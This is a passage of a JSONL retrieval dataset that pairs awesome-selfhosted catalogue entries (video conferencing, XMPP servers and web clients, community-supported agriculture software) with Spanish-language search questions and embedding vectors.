-0.02172, -0.04496, 0.01272, 0.02572, 0.01587, -0.00957, -0.05956, -0.06094, -0.00091, 0.01792, -0.00011, -0.08806, -0.01426, 0.0138, 0.0299, -0.02828, -0.03189, -0.00963]} +{"tipo": "pregunta", "herramienta": "Communication - Video Conferencing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Video Conferencing", "tema": "communication - video conferencing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Video Conferencing: MiroTalk SFU β€” Simple, secure, scalable real-time video conferences up to 4k, compatible with all browsers and platforms [AGPL-3.0, Nodejs/Docker]. plugNmeet β€” Scalable and high performance web conferencing system [MIT, Docker/Go].", "indexar": "con que puedo hacer conferencias online compatibles con todos los navegadores", "v": [0.31531, 0.10505, -0.11054, -0.13068, 0.04535, -0.02778, 0.13986, 0.00397, -0.07939, -0.10269, -0.00123, 0.02346, -0.01282, -0.0558, -0.00668, 0.14268, 0.13712, -0.0492, 0.03074, -0.00568, 0.0465, -0.02414, -0.07047, -0.05318, 0.09074, -0.05791, -0.01341, -0.0249, 0.02479, -0.07218, -0.05636, 0.01342, 0.01823, 0.0344, -0.00258, 0.04322, -0.06543, 0.06936, -0.03992, -0.05226, -0.04198, 0.08841, -0.14593, 0.00544, 0.01853, 0.01298, -0.07668, -0.05438, -0.03326, -0.08078, -0.04475, 0.00731, -0.13477, 0.01713, -0.07632, -0.12329, 0.16851, -0.0533, 0.03857, -0.0502, -0.02774, 0.04914, 0.06004, 0.02189, 0.02707, -0.03988, 0.02699, 0.03896, -0.07707, 0.07545, -0.11526, 0.00516, -0.00812, -0.00041, 0.02699, 0.15409, -0.0637, 0.06175, 0.07503, 0.05567, 0.08896, -0.04932, -0.00407, 0.01734, -0.04524, -0.04748, -0.03164, -0.0616, 0.0155, -0.00706, 0.07651, 0.09322, 0.04088, -0.08364, -0.02363, -0.12831, 0.10909, 0.03855, 0.00648, -0.01551, -0.05422, 0.07766, -0.03206, 0.08462, -0.04006, 0.01163, 0.09011, -0.11649, 0.00933, -0.06061, 0.02444, -0.04396, -0.05579, -0.10223, 0.0821, -0.00901, 0.01514, -0.05383, -0.00837, -0.01417, -0.03021, -0.06368, -0.04684, -0.00108, -0.01458, 0.0871, -0.08693, 0.07249, 0.01909, -0.03294, 0.00134, -0.05634, -0.05868, -0.06174, 0.06666, 0.10251, 0.00419, -0.10579, 0.03982, -0.03931, 0.09011, 0.06629, -0.01139, -0.00507, 0.08207, -0.01637, -0.01124, -0.02446, -0.0557, -0.08752, 0.05172, 0.10225, 0.01009, 0.07756, -0.00774, -0.05181, -0.10146, -0.0335, 0.02712, 0.09741, -0.00896, 0.05532, 0.09841, -0.01839, -0.04034, -0.00241, -0.08245, -0.0184, 0.05762, 0.03493, -0.04747, 0.09759, 0.00586, -0.11816, -0.03428, 0.00948, -0.04239, -0.01081, 0.04498, -0.10349, 0.00148, -0.00659, -0.07628, -0.04275, -0.0835, -0.03945, 0.00689, -0.02466, 0.00711, 0.00486, -0.02905, 0.03915, -0.06197, 0.05194, 0.05901, -0.0669, -0.06086, -0.03291, 0.03674, -0.03371, -0.02243, 0.00205, -0.00864, -0.05995, 0.01734, 0.0487, -0.02495, 0.05, -0.03155, 0.05074, -0.00087, -0.02707, 0.07054, -0.12074, -0.02559, -0.06691, 0.04048, -0.07687, 0.00178, 0.04747, 0.05327, -0.03201, 0.01527, 0.02295, 0.06326, 0.02888, 0.04925, -0.06129, -0.03095, 0.00498, 0.03728, -0.02825, -0.01513, -0.05527, 0.02185, 0.05836, -0.00613, 0.01281, -0.05833, 0.01891, -0.07833, -0.04424, 0.04665, -0.00657, 0.03442, -0.07388, -0.06848, 0.02364, 0.01883, -0.07971, -0.05203, 0.07198, 0.09399, 0.00526, -0.01122, 0.03097]} +{"tipo": "pregunta", "herramienta": "Communication - XMPP - Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Servers", "tema": "communication - xmpp - servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Servers: ejabberd β€” XMPP instant messaging server [GPL-2.0, Erlang/Docker]. MongooseIM β€” Mobile messaging platform with a focus on performance and scalability [GPL-2.0, Erlang/Docker/K8S]. Openfire β€” Real time collaboration (RTC) server [Apache-2.0, Java]. Prosody IM β€” Feature-rich and easy to configure XMPP server [MIT, Lua]. Snikket β€” All-in-one Dockerized easy XMPP solution, including web admin and clients [Apache-2.0, Docker]. Tigase β€” XMPP server implementation in Java [GPL-3.0, Java].", "indexar": "quΓ© servidor de mensajerΓ­a instantΓ‘nea puedo instalar en mi propio hogar?", "v": [0.10133, 0.15041, -0.1034, -0.11034, -0.00498, -0.07008, -0.00846, -0.12229, -0.10325, -0.02868, -0.06794, 0.01312, 0.02794, -0.05734, 0.02088, 0.12889, 0.24852, 0.01951, 0.07418, 0.0024, 0.03078, 0.03528, -0.08235, -0.02094, -0.07913, 0.02041, 0.08348, 0.02349, -0.10282, -0.03617, 0.04954, -0.07033, 0.11309, 0.00699, -0.0495, -0.06105, 0.01739, 0.08093, -0.01968, 0.03088, 0.17571, 0.04246, 0.00896, 0.06144, 0.04125, -0.08274, 0.08536, -0.13823, 0.00294, -0.02478, -0.06563, -0.1014, -0.04354, 0.02566, -0.05847, 0.02297, 0.22193, -0.13473, 0.14827, -0.02593, -0.09641, 0.1, 0.00696, 0.09118, 0.05587, -0.017, -0.06372, -0.04468, -0.12854, -0.09005, -0.06503, -0.0006, 0.01976, 0.01085, -0.02627, 0.14724, -0.10324, -0.00601, 0.03677, 0.09729, 0.09521, -0.08201, -0.00193, 0.02429, 0.00325, -0.11727, -0.0794, -0.07669, 0.07687, -0.07074, 0.08028, -0.01978, -0.04349, 0.10417, 0.04545, -0.10475, 0.04732, -0.06923, 0.0004, 0.07373, 0.01897, -0.03761, -0.04368, 0.11848, 0.01101, -0.03886, 0.03327, -0.06097, 0.04046, -0.05427, 0.01074, 0.00497, 0.00873, -0.01701, 0.00878, -0.06564, -0.02332, -0.05506, 0.02493, 0.00621, -0.11847, 0.02246, 0.14708, 0.08644, -0.01032, -0.06444, 0.05608, 0.01288, 0.00836, 0.02933, -0.00249, -0.09768, -0.00903, -0.06496, -0.02222, 0.06643, -0.0202, -0.12082, -0.05547, -0.02383, 0.00358, 0.03665, -0.04345, -0.0533, 0.07583, 0.08849, -0.03231, -0.1128, -0.06184, 0.04046, 0.07778, -0.01693, -0.06613, -0.02421, -0.00208, -0.03477, 0.03689, -0.0708, -0.00907, 0.02416, 0.01718, 0.02184, 0.03874, 0.05455, -0.02797, 0.01568, 0.02925, 0.07367, 0.04184, 0.10712, -0.08659, 0.02197, -0.02288, -0.02388, 0.00348, -0.0052, 0.01915, -0.01641, -0.03902, -0.04288, -0.01347, 0.08936, 0.00682, -0.03429, -0.01285, 0.02134, -0.05033, 0.01998, 0.02358, 0.04406, -0.0115, -0.00552, -0.08885, 0.04087, -0.00514, -0.05689, -0.0721, -0.07339, -0.00271, 0.0081, -0.04418, -0.02468, 0.00073, -0.01012, 0.00837, -0.02276, -0.05007, 0.01952, -0.012, 0.0188, 0.00919, -0.00221, 0.09291, -0.0227, 0.01027, 0.06971, 0.06545, -0.08514, 0.03453, 0.0187, 0.03195, 0.0191, -0.00599, -0.05042, -0.02187, 0.05387, -0.0104, -0.03388, 0.05303, 0.05085, -0.06842, 0.02109, -0.03959, -0.03186, 0.0939, -0.05647, 0.01716, -0.06706, -0.00974, -0.0517, 0.0157, 0.0482, -0.00923, 0.006, -0.04243, -0.03009, -0.01898, 0.01666, -0.06375, -0.03513, -0.03203, -0.04495, 0.03649, -0.0457, -0.01693, -0.00776]} +{"tipo": "pregunta", "herramienta": "Communication - XMPP - Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Servers", "tema": "communication - xmpp - servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Servers: ejabberd β€” XMPP instant messaging server [GPL-2.0, Erlang/Docker]. MongooseIM β€” Mobile messaging platform with a focus on performance and scalability [GPL-2.0, Erlang/Docker/K8S]. Openfire β€” Real time collaboration (RTC) server [Apache-2.0, Java]. Prosody IM β€” Feature-rich and easy to configure XMPP server [MIT, Lua]. Snikket β€” All-in-one Dockerized easy XMPP solution, including web admin and clients [Apache-2.0, Docker]. Tigase β€” XMPP server implementation in Java [GPL-3.0, Java].", "indexar": "cΓ³mo montan un servicio de chat en tiempo real sin pagar licencias?", "v": [0.14123, 0.02945, -0.02596, 0.00825, -0.10774, -0.13308, -0.06294, -0.04625, -0.13107, -0.07875, 0.00904, -0.20988, 0.13905, -0.03011, 0.07051, 0.09487, 0.01516, -0.059, 0.09622, -0.0174, -0.00695, -0.01167, 0.02665, -0.06381, -0.02841, 0.05889, 0.16242, -0.10984, -0.13233, 0.20616, 0.08074, 0.01817, 0.00817, 0.06953, 0.01365, -0.07595, 0.11322, 0.1254, 0.11052, -0.01446, 0.0956, -0.02483, 0.00056, 0.02049, -0.03761, -0.12225, -0.00319, 0.0615, -0.02597, -0.06108, -0.04174, -0.02055, -0.05222, -0.04868, 0.02096, -0.02999, 0.1108, -0.04316, 0.06418, -0.08133, -0.10275, 0.0362, -0.01225, 0.05031, 0.03695, 0.07809, 0.06373, 0.01662, -0.01453, -0.04172, -0.07308, -0.08324, 0.02737, 0.05548, -0.08212, -0.07261, -0.11622, -0.14993, 0.01734, 0.06532, 0.11347, -0.02632, -0.02779, 0.06247, -0.10703, 0.01674, 0.03721, -0.07518, 0.073, 0.01341, 0.03446, 0.18626, 0.0335, 0.08624, 0.03327, -0.04947, 0.06358, -0.01208, -0.00706, 0.03664, -0.03753, 0.0925, -0.0468, 0.03875, -0.01977, 0.05309, 0.13974, -0.11002, -0.10929, -0.00937, 0.02055, 0.04992, -0.10634, 0.00315, -0.00658, -0.04727, 0.03872, -0.05417, 0.01879, 0.06963, -0.03023, 0.03596, 0.07981, -0.01886, 0.02293, 0.00337, 0.01155, 0.07191, -0.02323, -0.04184, -0.04154, -0.00013, -0.03015, -0.02015, 0.0153, 0.03092, 0.03686, 0.0529, -0.05701, -0.04501, 0.04143, 0.05733, -0.03051, -0.01416, 0.05005, 0.04738, -0.12994, -0.16885, -0.10027, -0.03115, 0.05737, 0.01575, 0.00729, 0.10642, -0.02674, -0.04238, -0.01853, -0.06304, 0.02534, 0.08505, 0.10444, 0.05439, -0.02165, -0.07154, 0.02223, 0.01999, 0.03436, 0.0725, 0.06269, 0.01113, -0.00924, -0.02953, 0.05426, -0.00043, 0.03626, 0.03113, -0.00035, -0.04296, -0.01735, -0.01482, -0.04848, -0.03402, -0.02036, -0.05695, -0.00542, 0.06977, -0.01466, 0.02951, -0.05668, 0.00086, -0.00272, -0.01679, 0.0541, 0.01906, 0.02285, -0.07948, -0.02075, 0.02144, -0.06592, -0.05994, -0.01021, -0.0358, -0.04574, 0.00146, 0.00413, -0.05496, 0.01842, 0.13076, -0.03607, 0.04901, -0.02636, 0.00181, 0.04082, 0.02644, -0.03029, -0.00758, 0.05358, -0.06308, -0.06071, 0.00398, 0.03425, -0.0046, 0.02075, 0.04997, 0.01699, -0.0045, 0.03208, 0.09062, 0.00604, 0.00116, -0.05115, 0.05057, -0.06118, 0.00048, 0.0494, 0.00169, 0.07738, 0.01798, -0.02831, -0.04545, 0.00508, 0.08821, 0.01825, 0.03541, -0.06693, -0.01634, -0.06712, -0.0456, -0.0285, -0.01368, 0.03059, 0.0603, 0.03768, 0.02204, 0.05998, -0.05253]} +{"tipo": "pregunta", "herramienta": "Communication - XMPP - Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Servers", "tema": "communication - xmpp - servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Servers: ejabberd β€” XMPP instant messaging server [GPL-2.0, Erlang/Docker]. MongooseIM β€” Mobile messaging platform with a focus on performance and scalability [GPL-2.0, Erlang/Docker/K8S]. Openfire β€” Real time collaboration (RTC) server [Apache-2.0, Java]. Prosody IM β€” Feature-rich and easy to configure XMPP server [MIT, Lua]. Snikket β€” All-in-one Dockerized easy XMPP solution, including web admin and clients [Apache-2.0, Docker]. Tigase β€” XMPP server implementation in Java [GPL-3.0, Java].", "indexar": "necesito una alternativa libre a los servidores de WhatsApp, quΓ© opciones hay?", "v": [-0.02808, 0.09152, -0.15333, -0.04225, -0.14224, -0.05368, -0.00762, -0.15527, -0.06824, -0.08236, -0.09284, -0.21546, 0.03347, 0.04113, 0.01294, 0.10242, 0.11745, -0.06065, 0.12974, 0.08359, -0.00811, -0.07328, -0.10126, -0.04706, -0.1372, 0.05142, 0.00372, -0.03685, -0.13989, 0.09172, 0.02383, -0.07592, 0.02572, 0.01906, -0.03385, 0.17228, 0.02461, 0.09092, 0.03192, 0.01614, 0.09809, 0.04752, -0.09529, 0.10504, 0.00666, 0.01013, -0.10009, -0.03062, 0.05169, 0.01047, -0.00507, -0.05297, 0.01308, 0.08802, 0.00955, 0.0225, 0.16409, -0.06831, -0.02561, 0.0194, -0.14589, 0.12465, 0.02864, 0.04314, 0.08739, 0.05495, -0.07221, 0.03433, -0.04434, 0.10116, -0.02456, 0.00315, -0.03895, -0.00497, -0.02538, 0.09442, -0.15074, -0.02085, -0.02511, 0.05304, 0.0601, 0.04984, 0.13056, 0.01817, -0.09762, -0.07167, 0.06118, 0.0193, 0.0479, 0.03032, 0.04183, 0.1198, -0.02681, 0.16433, -0.01183, -0.07084, 0.03735, 0.04201, 0.04248, 0.08382, 0.09526, -0.06116, -0.00536, -0.02637, -0.03636, 0.02636, 0.04765, 0.00287, -0.01803, -0.00785, 0.02352, 0.00733, 0.05121, 0.08364, 0.00598, -0.13223, 0.01555, 0.01287, -0.00067, 0.05062, -0.0648, 0.02123, 0.02666, -0.05757, 0.04162, 0.01483, 0.08096, 0.04546, -0.03354, 0.03986, 0.04978, -0.08373, -0.1014, -0.07015, -0.10557, 0.02535, 0.10651, -0.00247, 0.02024, 0.00597, -0.00401, -0.0345, 0.01543, -0.10591, 0.05271, -0.02358, 0.06996, -0.07463, -0.05303, 0.01085, -0.03344, -0.04328, -0.08979, 0.08718, -0.05789, -0.02312, 0.00141, -0.09267, -0.06552, 0.111, 0.00057, -0.03586, -0.03344, 0.09519, 0.01413, -0.04233, 0.0522, -0.0064, -0.06605, -0.04822, -0.00489, 0.06435, 0.06938, -0.10997, 0.00081, -0.04527, -0.02946, -0.02304, 0.05207, -0.04878, 0.03536, 0.02669, -0.02101, -0.00845, -0.02916, -0.03626, -0.09222, 0.00704, -0.0118, 0.07013, -0.06272, 0.04595, -0.07137, -0.0269, 0.01746, -2e-05, -0.03607, -0.0779, -0.00861, -0.05207, -0.03404, -0.01507, -0.02425, 0.00271, -0.00551, -0.01391, -0.04707, 0.04804, -0.01997, 0.04769, -0.01908, -0.0092, 0.06474, 0.02312, -0.00722, 0.02264, 0.0808, -0.0274, 0.04176, -0.00772, 0.01911, 0.02452, 0.01662, 0.00912, 0.03994, 0.07456, -0.0247, 0.02849, -0.02177, 0.04238, 0.04461, 0.02813, -0.03582, 0.02956, 0.03069, -0.07668, 0.04732, -0.02682, -0.02759, -0.03945, 0.04565, 0.09902, -0.00496, 0.00722, -0.05219, -0.05752, -0.09385, 0.00045, -0.05398, -0.02832, 0.02015, 0.00734, 0.0287, 0.00559, 0.02792, -0.03381]} +{"tipo": "pregunta", "herramienta": "Communication - XMPP - Web Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Web Clients", "tema": "communication - xmpp - web clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Web Clients: Converse.js β€” XMPP chat client in your browser [MPL-2.0, Javascript]. Libervia β€” Web frontend from Salut Γ  Toi [AGPL-3.0, Python]. Salut Γ  Toi β€” Multipurpose, multi frontend, libre and decentralized communication tool [AGPL-3.0, Python].", "indexar": "que cliente web hay para chatear con XMPP?", "v": [0.07258, -0.03366, -0.02115, 0.04784, -0.14926, -0.11611, 0.01957, 0.08863, -0.02339, -0.00257, 0.04802, 0.03429, 0.00926, -0.09845, -0.104, 0.05632, -0.07589, -0.02404, 0.17792, -0.01422, 0.07806, 0.10542, -0.10302, -0.10098, -0.17646, 0.09577, 0.0339, -0.03946, -0.10419, 0.13592, 0.02308, -0.06632, -0.13857, 0.10145, 0.02709, -0.01679, -0.01104, -0.03193, -0.04583, 0.08314, 0.06671, -0.1136, -0.05123, 0.07973, 0.15205, 0.09763, -0.06081, -0.06025, -0.02862, 0.03517, -0.04823, -0.00979, -0.22296, 0.02387, -0.01622, 0.07108, 0.09845, -0.08614, 0.10555, -0.14592, 0.06547, 0.09108, -0.00802, 0.0042, 0.01891, -0.04633, -0.03526, -0.06723, 0.02543, 0.00375, -0.06516, -0.09783, 0.07463, 0.02105, 0.08321, -0.05252, 0.08056, -0.0273, 0.08756, 0.08921, 0.06902, -0.07615, -0.1823, -0.0158, -0.00572, 0.00639, 0.01017, -0.02559, -0.011, -0.02706, 0.16438, 0.07122, -0.01226, 0.07422, -0.03592, -0.19142, 0.06734, -0.05161, 0.00696, -0.00052, 0.02999, 0.068, -0.11004, -0.05143, -0.01941, -0.06448, 0.07062, -0.01095, -0.03713, -0.03841, 0.00981, -0.01604, -0.02588, -0.04646, -0.03017, -0.11894, 0.03346, -0.03122, -0.00167, -0.03334, -0.03049, 0.07381, -0.03344, 0.06776, -0.05518, -0.02948, 0.04556, 0.03691, 0.07403, -0.08015, 0.03711, -0.0488, -0.05552, 0.03984, 0.01608, 0.0844, 0.08861, 0.05352, -0.01966, 0.0101, -0.03279, -0.03226, -0.03597, -0.0035, 0.03319, 0.05248, 0.03167, -0.00819, -0.02927, 0.03249, 0.0128, 0.03038, -0.00552, 0.01959, -0.03777, -0.01342, -0.05781, 0.02431, 0.1, 0.01893, -0.06315, -0.0219, 0.11239, 0.05313, 0.04445, 0.02171, -0.05156, 0.09543, 0.06457, -0.01048, -0.036, 0.0681, 0.01687, -0.10989, 0.0609, 0.00565, -0.09007, -0.07754, 0.07821, -0.00526, -0.03809, -0.08193, 0.00417, 0.07216, -0.03919, 0.00776, -0.05771, 0.02197, -0.02958, -0.05078, -0.08441, -0.00303, -0.05224, 0.01652, 0.05091, -0.07925, -0.02796, 0.0271, -0.03541, -0.06441, -0.00968, -0.02489, 0.06448, -0.03678, -0.01062, 0.04576, -0.02281, -0.00721, -0.03842, 0.03614, 0.01037, -0.05621, 0.07455, 0.01573, -0.02811, 0.01879, 0.03243, -0.00066, -0.06256, 0.01926, -0.02327, -0.03618, 0.0042, -0.02164, 0.02029, 0.04069, 0.01532, -0.00799, 0.04394, 0.01683, -0.03955, -0.05847, -0.01187, -0.035, 0.05145, 0.03376, -0.04548, -0.02678, -0.04481, -0.0719, 0.02502, 0.03507, -0.02968, -0.05911, 0.01343, -0.02586, -0.06803, 0.04129, 0.0379, -0.04681, 0.01541, -0.02903, -0.03312, 0.01435, 0.00784, 0.05805]} +{"tipo": "pregunta", "herramienta": "Communication - XMPP - Web Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Web Clients", "tema": "communication - xmpp - web clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Web Clients: Converse.js β€” XMPP chat client in your browser [MPL-2.0, Javascript]. Libervia β€” Web frontend from Salut Γ  Toi [AGPL-3.0, Python]. Salut Γ  Toi β€” Multipurpose, multi frontend, libre and decentralized communication tool [AGPL-3.0, Python].", "indexar": "con quΓ© puedo montar un servicio de chat libre y descentralizado?", "v": [-0.06568, 0.06416, -0.16701, 0.03583, -0.21641, -0.10257, -0.02645, 0.03626, -0.14099, -0.12613, -0.12426, -0.10311, -0.04541, -0.02014, 0.03521, 0.09302, 0.02712, -0.03676, 0.07751, -0.01286, -0.01503, -0.08796, 0.05129, -0.10252, -0.08148, 0.07183, 0.05607, -0.09407, -0.08414, 0.10419, 0.07135, 0.00807, -0.01238, 0.11208, 0.0762, -0.13568, 0.10269, 0.05083, 0.00246, -0.04173, -0.02273, -0.05203, -0.04333, 0.06729, 0.10266, -0.03576, 0.03477, -0.10015, 0.01816, 0.02711, -0.02547, -0.1277, -0.08574, -0.03044, -0.04427, 0.02239, 0.03813, -0.03227, 0.05056, -0.09075, -0.04422, 0.10034, 0.00918, 0.00364, 0.04374, -0.05657, -0.11982, 0.04348, -0.05567, 0.07412, 0.00237, -0.05215, 0.03825, 0.04128, -0.06475, 0.0716, -0.18109, -0.04765, 0.02893, 0.02636, 0.05665, 0.01404, -0.006, 0.08406, -0.03149, 0.00677, 0.04748, -0.08195, 0.01923, 0.03164, 0.10542, 0.14022, -0.00332, 0.07562, -0.00781, -0.07786, 0.02192, 0.10034, 0.04589, 0.03344, 0.0766, 0.03336, -0.05371, 0.1352, 0.03302, -0.09692, 0.12484, -0.07386, -0.00228, -0.06354, 0.00838, 0.04147, -0.01417, 0.00535, -0.09846, -0.0873, -0.0602, 0.07681, 0.01508, 0.04191, -0.02412, 0.04253, 0.09262, -0.02128, 0.00599, -0.00827, 0.10127, 0.08695, 0.02923, 0.08184, 0.0088, 0.02221, -0.10374, -0.12386, 0.03357, 0.01096, 0.05513, -0.02397, 0.02551, 0.03892, 0.00498, 0.00429, -0.04361, -0.02419, 0.09117, 0.02197, 0.04682, -0.12568, -0.01561, 0.01797, 0.0265, 0.09583, 0.06746, 0.08555, -0.02408, -0.02578, 0.02175, -0.10161, 0.04593, 0.10139, -0.00883, 0.03038, -0.0205, 0.01778, 0.02952, 0.0152, -0.00225, -0.00677, 0.02528, -0.00023, -0.05604, 0.02603, 0.06849, -0.08377, 0.10558, 0.01906, -0.05948, -0.06452, 0.01438, -0.06515, -0.02465, 0.00217, -0.0449, -0.01351, -0.05878, 0.02964, -0.05796, -0.02785, 0.05704, 0.00793, -0.05701, -0.00391, -0.04316, 0.03496, 0.06396, -0.0628, -0.03164, 0.01987, -0.02191, -0.04563, -0.06673, -0.01767, 0.02462, 0.01501, -0.05922, 0.00368, -0.03109, 0.09471, 0.00197, 0.08317, 0.03799, -0.01067, 0.12244, -0.04277, -0.02953, 0.02425, 0.06998, -0.02195, -0.03767, 0.01455, 0.04181, 0.03288, 0.07504, 0.03116, 0.02399, -0.0012, 0.06119, 0.05648, 0.07258, 0.06977, -0.04982, 0.00511, 0.0086, -0.04329, 0.02922, 0.0124, 0.07754, 0.01314, -0.02014, -0.04712, 0.02186, 0.1277, -0.06572, -0.02876, -0.00319, -0.05023, -0.08224, 0.00623, -0.06225, -0.04469, -0.01615, 0.01691, 0.0118, -0.05632, 0.00154, -0.04248]} +{"tipo": "pregunta", "herramienta": "Communication - XMPP - Web Clients", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - XMPP - Web Clients", "tema": "communication - xmpp - web clients", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - XMPP - Web Clients: Converse.js β€” XMPP chat client in your browser [MPL-2.0, Javascript]. Libervia β€” Web frontend from Salut Γ  Toi [AGPL-3.0, Python]. Salut Γ  Toi β€” Multipurpose, multi frontend, libre and decentralized communication tool [AGPL-3.0, Python].", "indexar": "cual es una alternativa abierta a los clientes de mensajerΓ­a tradicionales?", "v": [0.1199, 0.10428, -0.05017, 0.00583, -0.06908, -0.01218, 0.04351, -0.02562, -0.11284, -0.07299, -0.04615, -0.13282, 0.08852, -0.01016, 0.04392, -0.03226, 0.10884, 0.03806, 0.21319, -0.02795, 0.003, 0.04076, -0.16296, -0.06051, -0.08896, -0.06637, 0.02102, -0.03843, -0.02606, 0.12476, 0.12066, -0.05402, 0.12023, -0.00805, -0.01706, 0.07274, 0.0473, 0.02795, -0.02009, -0.07242, 0.17044, -0.08466, -0.07027, -0.01288, -0.03787, -0.05363, -0.05067, 0.03111, -0.08093, 0.06042, -0.09009, -0.06368, -0.0995, 0.02038, 0.07346, 0.04552, 0.14855, 0.00096, -0.0024, -0.06548, 0.06582, 0.09074, 0.06199, 0.0079, 0.06037, -0.09696, 0.01887, -0.05163, -0.10357, -0.00185, 0.04378, 0.0286, -0.03644, 0.04941, -0.05655, 0.11982, -0.09956, 0.13592, -0.07877, 0.12215, 0.08105, -0.09189, 0.04836, -0.04009, -0.04256, -0.0864, -0.03578, -0.05348, -0.02195, -0.06634, 0.0855, 0.03512, -0.03616, 0.12478, -0.00062, -0.11301, -0.11391, -0.09466, -0.0667, 0.11984, 0.03234, -0.00136, -0.06617, 0.02906, 0.05034, -0.10748, -0.00909, -0.08252, 0.01321, 0.04031, 0.02329, -0.04602, 0.06765, 0.04107, -0.02287, -0.08741, -0.00902, -0.03226, 0.04505, 0.00153, -0.1346, 0.04663, 0.03232, 0.03957, 0.02183, 0.05543, -0.04765, 0.02727, -0.02672, 0.03726, -0.01389, -0.06976, -0.03303, -0.04646, -0.05151, -0.02723, 0.07864, -0.01002, 0.08044, 0.0497, -0.01003, 0.00129, 0.01873, -0.11083, 0.10115, 0.00405, -0.01141, -0.12195, -0.077, 0.02572, -0.04528, 0.02142, -0.07894, 0.04675, -0.0287, 0.00914, -0.03411, -0.04878, -0.02909, 0.18695, 0.03526, -0.01636, 0.01348, 0.03057, -0.02884, -0.06978, -0.0501, 0.02596, 0.00653, -0.02396, -0.00565, -0.00961, 0.03315, 0.00397, -0.02589, 0.01131, -0.0589, -0.03576, 0.0313, -0.07264, -0.00152, 0.04521, -0.03226, 0.00318, 0.06815, -0.00612, -0.02116, -0.0084, 0.00756, 0.0476, 0.00656, 0.01791, -0.11462, -0.07571, -0.07658, -0.02203, -0.02248, -0.04809, -0.06856, 0.02958, -0.01311, -0.01557, -0.04939, -0.05377, -0.08935, 0.04539, -0.06426, 0.03635, -0.04772, 0.06677, 0.03376, -0.06306, 0.09153, -0.01522, 0.00657, 0.01796, 0.00071, -0.08165, 0.01227, 0.03825, -0.03224, -0.00643, 0.00297, -0.0278, -0.0492, 0.07456, 0.02487, 0.0824, 0.00663, -0.00112, -0.01609, 0.02736, -0.049, 0.04128, 0.06867, -0.00127, -0.00136, -0.08235, -0.02721, -0.03444, 0.03229, 0.0275, -0.00376, 0.06716, 0.03101, 0.02807, -0.10579, 0.00738, -0.06209, -0.02297, -0.08002, 0.05845, 0.0273, -0.00014, 0.06113, -0.0406]} +{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): ACP Admin β€” CSA administration. Manage members, subscriptions, deliveries, drop-off locations, member participation, invoices and emails (documentation in French) [MIT, Ruby]. FoodCoopShop β€” User-friendly software for food-coops [AGPL-3.0, PHP/Docker]. Foodsoft β€” Manage a non-profit food coop (product catalog, ordering, accounting, job scheduling) [AGPL-3.0, Docker/Ruby]. Hive-Pal β€” Mobile-first beekeeping management app for tracking hives, inspections, queen records, and equipment with streamlined data entry optimized for field use [MIT, Nodejs/Docker]. juntagrico β€” Management platform for community gardens and vegetable cooperatives [LGPL-3.0, Python]. Open Food Network β€” Online marketplace for local food. It enables a network of independent online food stores that connect farmers and food hubs with individuals and local businesses [AGPL-3.0, Ruby]. OpenOlitor β€” Administration platform for Community Supported Agriculture groups [AGPL-3.0, Scala].", "indexar": "con quΓ© programa puedo gestionar una cooperativa de alimentaciΓ³n", "v": [-0.06432, -0.01633, -0.03361, -0.17793, -0.01106, -0.13781, 0.13018, 0.1838, -0.18165, -0.13089, -0.09872, -0.01574, 0.05549, -0.01784, -0.0611, -0.0002, 0.17815, -0.04358, -0.01673, 0.04166, 0.02102, 0.0808, 0.05283, -0.00905, -0.00832, 0.03444, 0.08926, -0.03404, 0.04702, 0.03738, 0.03816, -0.04825, 0.0814, -0.03405, -0.1014, 0.11133, -0.08214, -0.02481, 0.07756, -0.14403, -0.0438, -0.04234, -0.0285, -0.05673, 0.09034, 0.02528, -0.02536, -0.13493, -0.02171, 0.05613, -0.0549, -0.01441, 0.03112, -0.02837, 0.02827, 0.07678, -0.08506, -0.09209, -0.02773, 0.08018, 0.0437, 0.0333, -0.02549, -0.10089, 0.00643, -0.00017, -0.03166, -0.01027, -0.02914, 0.12185, 0.02797, 0.08228, -0.00695, -0.06383, -0.01756, 0.02325, 0.0356, 0.12984, 0.01704, -0.11846, 0.04222, -0.06221, 0.03988, 0.06197, 0.02892, -0.0687, 0.02316, -0.00694, -0.03766, -0.07611, 0.05351, -0.02847, 0.0604, -0.01082, 0.02147, 0.00346, 0.01633, 0.04745, -0.064, 0.06143, -0.07288, -0.01291, -0.11988, 0.07508, 0.02856, -0.00368, 0.08367, -0.06275, -0.0846, 0.00484, -0.01017, 0.01314, -0.03752, -0.11946, -0.01595, 0.12626, -0.11493, 0.01844, 0.0841, -0.01272, -0.06725, -0.00466, -0.01328, 0.0614, 0.17937, 0.04403, 0.03548, 0.18334, 0.02132, 0.06124, -0.10684, 0.10853, 0.05657, -0.03418, 0.02689, -0.13603, -0.03673, 0.03858, -0.02106, -0.11408, -0.11734, 0.02869, 0.04267, -0.07285, 0.03393, -0.02898, 